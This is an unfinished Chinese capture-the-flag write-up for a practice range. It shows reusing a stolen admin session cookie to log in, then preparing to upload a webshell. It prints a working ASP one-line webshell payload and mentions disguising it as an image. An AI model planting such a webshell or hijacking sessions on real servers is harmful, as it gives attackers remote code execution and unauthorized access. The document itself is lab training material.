ctf實戰 掌控安全的靶場 第五關通關記錄

看了題目和Tips，這題是須要咱們用上一題竊取的cookie來登陸後臺而後上傳WEBSHELL，而後鏈接菜刀獲取flag。

 

先找到上一題打來的cookie。

而後按F12選擇Application，而後看右邊有一個cookies而後選擇咱們的題目的地址，而後點擊空白的地方，

 

把ADMINSESSIONIDCSTRCSDQ粘貼在Name下

LBMLMBCCNPFINOANFGLPCFBC粘貼在value下，F5刷新進入後臺

 

 

而後咱們直接找上傳點，畢竟getshell咱們是須要在服務器的WWW文件夾裏面放一段惡意代碼的。 

咱們先去百度找ASP一句話木馬，由於是ASP的環境 

ASP一句話木馬：<%eval request ("pass")%> 密碼是pass eval是個函數，request是接受參數的。有興趣瞭解一句話的能夠自行百度。 

通常而言直接傳木馬文件都極可能被攔截，因此通常而言一句話木馬都會作成圖片馬。圖片馬製做很是簡單，一條CMD命令就能夠了

 

未完待續，睡會兒，要卒了